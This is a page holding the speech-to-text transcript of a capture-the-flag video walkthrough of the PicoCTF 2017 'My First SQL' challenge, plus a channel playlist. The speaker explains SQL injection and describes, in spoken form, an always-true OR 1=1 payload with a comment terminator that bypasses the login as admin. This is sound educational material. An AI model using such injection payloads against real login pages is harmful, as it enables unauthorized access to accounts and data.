Basic SQL Injection | PicoCTF 2017 [35] My First SQL

John Hammond · Intermediate ·🔐 Cybersecurity ·7y ago

Key Takeaways

Basic SQL Injection | PicoCTF 2017 [35] My First SQL

Full Transcript

hello everyone my name is John Hammond welcome back to more Pecos CTF this challenge is called my first sequel the first challenge in the web category of level 2 here 50 points it says I really need access to this website but I forgot my password and there's no reset can you help so we can check out the website open up a new tab here just like a regular forum login user name and password so credentials we would otherwise have to know what the hint here is have you heard about sequel injection so this is the first Pico CTF introduction to sequel injection which is one of my favorite things I think one of the coolest things for hacking on the internet and stuff like that sequel injection is tricking a back-end web program into thinking that you are inputting data into a database that runs in the back however it's not real data that you're putting in you're tricking it and that it's going to take some of that data and consider it to be code so normally you'll see queries that are trying to insert or select data from a database that's of the the syntax and the style select something some kind of column or table information from a specific table where whatever column or field is something else so if you get your own input that's kind of just being concatenated or added into the original query there is significant potential for like bad things to happen that's a vulnerability if you are just concatenate those sequel luck constants and their sequel literals so this is kind of exactly what we can assume this website is doing and if I wanted to just like login with please sub and a password password that's weird not ok I don't know why that's not the regular login that makes no sense to me but whatever we can inject something into this determine if whether or not a user exists or not by getting a condition to log in that we know is always going to be true because this where clause in that sequel statement is running a test it is running a conditional where name is equal to something that we supply but we can inject hence sequel injection some other code or sequel into that a sequel being the language of course it's being run in the background I don't want to baby this up but I know I should and that some people are wanting to learn this for the first time a sequel injection the magic thing the bird kind of like bare bones basic test you'll see in like sequel injection challenges and tests of this it's just determining can we get one thing that obviously equals another thing to return or to go through sometimes you don't know the kind of string or quotations that it's using to determine a string and maybe using double quotes or single quotes to denote their string so you kind of have to fuzz testing which one you are trying to end because you're again concatenating in your input inside of what would expect to be a string so you have to escape or end out of their string with a terminating quote double quote or not continue sequel quote with adding a new condition or an or statement for this we're essentially an if clause or test clause in another condition where something is equal to obviously itself so that will that will clearly return true 1 is equal to 1 but we don't know what it is at the very end of this query so sometimes we'll have to comment out the rest of the sequel code and the way we do that again is dependent on the sequel that's running in the background like the back end database version maybe it's my sequel maybe it's Microsoft sequel rendition the sequel Lite it's that wrote cetera and we all have a different kind of form so again you'll have to fuzz and fudge that until you get something that that will return a hit so if we wanted to we could simply try double quote or one equals one and then a hash tag is what you'd expect for some my sequel versions I'm just gonna paste that in both the username and the password field because we don't know which one is vulnerable we can go ahead and try and log in but that doesn't work for us so okay let's try with or one equals one another pound symbol or a hash tag because that is what my sequel uses for comments try and log in with that oh okay we get an error with your request and it shows us actually the query that's trying to run in the background you don't normally see this this is again just for your learning capability in the CTF scene because CTF is being nice to us where it shows us what they're trying to use they're using a single quote where user equals the start of our input you see we have our single quote inject it into it so that's why the error is happening because it's trying to interpret this or one equals one but our hash tag is being weird it's getting in the way because we now don't have a string that matches the rest of this password is in there as well so maybe it's not this the comments style but we do know we are using simple quotes for our string so let's change that rather than using a hashtag the Wikipedia pages suggest some other things where you can use - - or - - to use a comment that you'd expect to see in sequel light so let's try that again I'm gonna use it in the username and password field and we log in welcome admin flag be careful what you let people ask in the hash that should be different for each one so we logged in as admin because we got an immediate return and it immediate truth in our condition where one equals one or one equals one so the first thing that we return is the very first row in the table that we're looking at likely admin are usually admin so cool immediate login we've got our flag if we wanted to we can script this and I'd showcase that another video but I don't think it's necessary for this one we can paste that in and we can jump up on the scoreboard 50 points super cool that's equal injection I will however want to take a note of that as our flag because I think that's good practice certainly writing again flag strip would also be good practice for it but whatever I digress if you'd like me to we certainly can I'd use some Python requests use regular expressions to pull out the flag and we'd be grooving special shout out to the people that support me on patreon - thank you guys so much I love you that was weird sorry a $1 or more on patreon a month will give you a special shout-out just like this at the end of her video five dollars or more on patreon will give you a special access to a folder on Google Drive that I like to upload my early access videos well I include all the videos that I have recorded but not yet released on YouTube because I normally record in bulk and YouTube gradually upload them on a on a scheduled basis so if you want to not wait you want the content right when it's ready that's the best way to do it just $5 a month on patreon if you did like this video please do press that like button maybe leave me a comment if you're willing to subscribe that would be awesome link in the description to draw our discord server it's a cool community of CTF player's programmers and hackers if you want to hang out with me or some other awesome people that's the best way to do that hope to see you guys on patreon thank you and I hope to see you in the next video bye

Original Description

If you would like to support me, please like, comment & subscribe, and check me out on Patreon: https://patreon.com/johnhammond010 E-mail: johnhammond010@gmail.com PayPal: http://paypal.me/johnhammond010 GitHub: https://github.com/JohnHammond Site: http://www.johnhammond.org Twitter: https://twitter.com/_johnhammond
Watch on YouTube ↗ (saves to browser)
Sign in to unlock AI tutor explanation · ⚡30

Playlist

Uploads from John Hammond · John Hammond · 0 of 60

← Previous Next →
1 Code Commentaries? PHP to JavaScript in Bash and PHP!
Code Commentaries? PHP to JavaScript in Bash and PHP!
John Hammond
2 Tutorials? MySQL connection with PHP and Bash!
Tutorials? MySQL connection with PHP and Bash!
John Hammond
3 Variable Naming in Python! Happy Birthday, Linux! Nokia N900!
Variable Naming in Python! Happy Birthday, Linux! Nokia N900!
John Hammond
4 JavaScript Splits The URL!
JavaScript Splits The URL!
John Hammond
5 HTML Tables in Python!
HTML Tables in Python!
John Hammond
6 HTML, Net Shares, GML!
HTML, Net Shares, GML!
John Hammond
7 Python 08 Programming Style and Comments
Python 08 Programming Style and Comments
John Hammond
8 Python 26 Object Oriented Programming
Python 26 Object Oriented Programming
John Hammond
9 75 Python Tutorials, Out Now!
75 Python Tutorials, Out Now!
John Hammond
10 Batch 14 Mathematical Expressions
Batch 14 Mathematical Expressions
John Hammond
11 Batch 85 Array Append
Batch 85 Array Append
John Hammond
12 Batch 86 Array Count
Batch 86 Array Count
John Hammond
13 Batch 87 Array Index
Batch 87 Array Index
John Hammond
14 Batch 88 Array Insert
Batch 88 Array Insert
John Hammond
15 Batch 89 Array Remove
Batch 89 Array Remove
John Hammond
16 Batch 90 Array Reverse
Batch 90 Array Reverse
John Hammond
17 Python [colorama] 00 Installing on Linux
Python [colorama] 00 Installing on Linux
John Hammond
18 Python [colorama] 09 Cursor Position
Python [colorama] 09 Cursor Position
John Hammond
19 Python [hashlib] 02 Algorithms
Python [hashlib] 02 Algorithms
John Hammond
20 Python 00 Installing IDLE on Linux
Python 00 Installing IDLE on Linux
John Hammond
21 Python [pygame] 11 Rectangular Collision Detection
Python [pygame] 11 Rectangular Collision Detection
John Hammond
22 Python [pygame] 12 Platforming Rectangular Collision Resolution
Python [pygame] 12 Platforming Rectangular Collision Resolution
John Hammond
23 Python [XML-RPC] 01 Research
Python [XML-RPC] 01 Research
John Hammond
24 Python [pyenchant] 03 Personal Word Lists
Python [pyenchant] 03 Personal Word Lists
John Hammond
25 FancyURLopener Authentication and User-Agent [urllib] 03
FancyURLopener Authentication and User-Agent [urllib] 03
John Hammond
26 Python 04: PEP8 Coding
Python 04: PEP8 Coding
John Hammond
27 Python Challenge! 17 COOKIES
Python Challenge! 17 COOKIES
John Hammond
28 Google CTF 2016: Ernst Echidna
Google CTF 2016: Ernst Echidna
John Hammond
29 Google CTF 2016: Spotted Quoll
Google CTF 2016: Spotted Quoll
John Hammond
30 Google CTF 2016: Can you Repo It?
Google CTF 2016: Can you Repo It?
John Hammond
31 Google CTF 2016: No Big Deal
Google CTF 2016: No Big Deal
John Hammond
32 Google CTF 2016: In Recorded Conversation
Google CTF 2016: In Recorded Conversation
John Hammond
33 Homemade CTF Challenge: 01 "Orchestra"
Homemade CTF Challenge: 01 "Orchestra"
John Hammond
34 Homemade CTF Challenge: 02 "Bae's Base"
Homemade CTF Challenge: 02 "Bae's Base"
John Hammond
35 Homemade CTF Challenge: 03 "Web Hunt"
Homemade CTF Challenge: 03 "Web Hunt"
John Hammond
36 Homemade CTF Challenge: 04 "UPX"
Homemade CTF Challenge: 04 "UPX"
John Hammond
37 Homemade CTF Challenge: 05 "The Assumption Song"
Homemade CTF Challenge: 05 "The Assumption Song"
John Hammond
38 Homemade CTF Challenge: 06 "A Brisk Stroll"
Homemade CTF Challenge: 06 "A Brisk Stroll"
John Hammond
39 Homemade CTF Challenge: 06 "I lost my password!"
Homemade CTF Challenge: 06 "I lost my password!"
John Hammond
40 web25 :: Mr. Robot : EKOPARTY CTF 2016
web25 :: Mr. Robot : EKOPARTY CTF 2016
John Hammond
41 web50 : RFC 7230 :: EKOPARTY CTF 2016
web50 : RFC 7230 :: EKOPARTY CTF 2016
John Hammond
42 misc50 : Hidden inside EKO :: EKOPARTY CTF 2016
misc50 : Hidden inside EKO :: EKOPARTY CTF 2016
John Hammond
43 Hack The Vote 2016 CTF: Sander's Fan Club [web100]
Hack The Vote 2016 CTF: Sander's Fan Club [web100]
John Hammond
44 Hack The Vote 2016 CTF Warpspeed [forensics150]
Hack The Vote 2016 CTF Warpspeed [forensics150]
John Hammond
45 Juniors CTF 2016 :: Black Suprematic Square
Juniors CTF 2016 :: Black Suprematic Square
John Hammond
46 Juniors CTF 2016 :: Six Strange Tales
Juniors CTF 2016 :: Six Strange Tales
John Hammond
47 Juniors CTF 2016 :: Lost Code
Juniors CTF 2016 :: Lost Code
John Hammond
48 Juniors CTF 2016 :: Here Goes!
Juniors CTF 2016 :: Here Goes!
John Hammond
49 Juniors CTF 2016 :: Southern Cross
Juniors CTF 2016 :: Southern Cross
John Hammond
50 Juniors CTF 2016 :: Clone Attack
Juniors CTF 2016 :: Clone Attack
John Hammond
51 Juniors CTF 2016 :: Dirty Repo
Juniors CTF 2016 :: Dirty Repo
John Hammond
52 Juniors CTF 2016 :: Hackers Blog
Juniors CTF 2016 :: Hackers Blog
John Hammond
53 Juniors CTF 2016 :: Voting!!!
Juniors CTF 2016 :: Voting!!!
John Hammond
54 Juniors CTF 2016 :: The Good, The Bad and The Junkman
Juniors CTF 2016 :: The Good, The Bad and The Junkman
John Hammond
55 Juniors CTF 2016 :: Stop Thief!
Juniors CTF 2016 :: Stop Thief!
John Hammond
56 Juniors CTF 2016 :: ROFL
Juniors CTF 2016 :: ROFL
John Hammond
57 Juniors CTF 2016 :: Restriced Area
Juniors CTF 2016 :: Restriced Area
John Hammond
58 Juniors CTF 2016 :: Oh SSH!
Juniors CTF 2016 :: Oh SSH!
John Hammond
59 HackCon CTF 2017 TRIVIA and BONUS Challenges
HackCon CTF 2017 TRIVIA and BONUS Challenges
John Hammond
60 HackCon CTF 2017 "Bacche" Challenges
HackCon CTF 2017 "Bacche" Challenges
John Hammond

Related AI Lessons

Up next
Cyber security threats @FameWorldEducationalHub #cybersecurity #threats #shorts #ytshorts
FAME WORLD EDUCATIONAL HUB
Watch →